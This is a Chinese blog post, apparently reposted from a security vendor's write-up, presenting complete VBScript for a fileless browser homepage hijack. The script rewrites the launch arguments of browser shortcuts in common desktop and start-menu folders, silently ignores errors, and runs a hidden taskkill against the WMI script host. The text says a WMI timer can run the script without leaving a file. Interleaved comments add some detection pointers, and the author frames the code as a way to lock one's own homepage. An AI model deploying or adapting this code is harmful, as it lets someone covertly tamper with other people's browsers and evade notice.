|
From:
http://blog.zemana.com/2016/04/yeabestscc-fileless-browser-hijacker_24.html
---
0x00 简介
vbs脚本,执行后会修改当前系统中常见浏览器快捷方式(.lnk)的启动参数,使浏览器从快捷方式启动时打开指定页面,效果等同于修改主页(浏览器自身的主页设置并未改动)
通过wmi定时调用此脚本可实现无文件劫持浏览器主页
原文已给出防御和检测方法,所以此处略
---
0x01 应用
技术不分好坏
我们学习了这个技巧同样可以用来锁定自己的浏览器
vbs代码如下,主页锁定为http://www.baidu.com
- ' Purpose: walk a fixed list of Desktop / Start Menu / Quick Launch folders and,
- ' for every .lnk whose target file name is a known browser executable, set the
- ' shortcut's Arguments to the URL in `link`. The browser's own homepage setting
- ' is never touched; only shortcut files are rewritten.
- ' Review/detection note: the artifacts this listing leaves are browser .lnk files
- ' whose Arguments hold a URL, plus a hidden "cmd /c taskkill" child process.
- ' objFS is created here but not used again in this listing (fso below is used instead).
- Dim objFS
- Set objFS = CreateObject("Scripting.FileSystemObject")
- ' From here on every runtime error is silently skipped (missing folder,
- ' unreadable shortcut, failed Save), so the script gives no sign of partial failure.
- On Error Resume Next
- ' URL written into each matching shortcut.
- Const link = "http://www.baidu.com"
- ' Executable names treated as browsers; matching is done on the file name only.
- browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
- ' Lower-cased name -> original name, used for a case-insensitive lookup.
- Set BrowserDic = CreateObject("scripting.dictionary")
- For Each browser In browsers
- BrowserDic.Add LCase(browser), browser
- Next
- ' Despite the name this is an array, not a dictionary. Dim (12) allocates
- ' indices 0..12, but only 0..11 are assigned; the last loop pass hits an empty
- ' entry and the resulting error is swallowed by On Error Resume Next.
- Dim FoldersDic(12)
- Set WshShell = CreateObject("Wscript.Shell")
- ' Hard-coded folders that are scanned (non-recursively). The per-user paths are
- ' tied to a profile named "a", i.e. the author's test machine.
- ' These are also the locations to audit when checking for tampered shortcuts.
- FoldersDic(0) = "C:\Users\Public\Desktop"
- FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu"
- FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
- FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
- FoldersDic(4) = "C:\Users\a\Desktop"
- FoldersDic(5) = "C:\Users\a\AppData\Roaming\Microsoft\Windows\Start Menu"
- FoldersDic(6) = "C:\Users\a\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
- FoldersDic(7) = "C:\Users\a\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
- FoldersDic(8) = "C:\Users\a\AppData\Roaming"
- FoldersDic(9) = "C:\Users\a\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
- FoldersDic(10) = "C:\Users\a\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu"
- FoldersDic(11) = "C:\Users\a\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
- Set fso = CreateObject("Scripting.Filesystemobject")
- For i = 0 To UBound(FoldersDic)
- ' Only files directly inside the folder are visited; subfolders are not walked.
- For Each file In fso.GetFolder(FoldersDic(i)).Files
- If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
- set oShellLink = WshShell.CreateShortcut(file.Path)
- ' Rebuild "name.ext" of the shortcut target and compare it with the browser list.
- path = oShellLink.TargetPath
- name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
- If BrowserDic.Exists(LCase(name)) Then
- ' Replaces (does not append to) whatever arguments the shortcut already had.
- oShellLink.Arguments = link
- ' Attribute bit 1 is ReadOnly; it is cleared so that Save below can write the file.
- If file.Attributes And 1 Then
- file.Attributes = file.Attributes - 1
- End If
- oShellLink.Save
- End If
- End If
- Next
- Next
- ' Runs taskkill in a hidden window (window style 0) against scrcons.exe, the WMI
- ' script event consumer host. When the script is launched through WMI as the
- ' introduction describes, this presumably ends the host process that ran it.
- ' NOTE(review): scrcons.exe spawning cmd.exe/taskkill is a useful signal to alert on.
- createobject("wscript.shell").run "cmd /c taskkill /f /im scrcons.exe", 0
执行后会更改系统中浏览器的主页(实际改动的是快捷方式“目标”中的参数,可在快捷方式属性里查看和还原),如图
---
仅作测试,不许抄作业,后果自负
|
|